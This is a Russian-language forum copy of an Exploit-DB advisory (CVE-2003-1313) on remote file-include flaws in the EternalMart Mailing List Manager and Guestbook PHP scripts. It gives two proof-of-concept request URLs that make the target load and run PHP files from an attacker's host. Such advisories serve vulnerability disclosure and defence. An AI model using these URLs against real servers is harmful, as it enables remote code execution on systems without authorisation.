- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 23218
- Проверка EDB
-
- Пройдено
- Автор
- FROG
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2003-1313
- Дата публикации
- 2003-10-04
Код:
source: https://www.securityfocus.com/bid/8767/info
EternalMart Mailing List Manager and Guestbook are prone to remote file-include vulnerabilities. Remote attackers may cause malicious PHP code to run on the webserver.
http://[target]/admin/auth.php?emml_admin_path=http://[attacker] will
include the file :
http://[attacker]/auth_func.php
http://[target]/emml_email_func.php?emml_path=http://[attacker] will
include the file :
http://[attacker]/class.html.mime.mail.php- Источник
- www.exploit-db.com
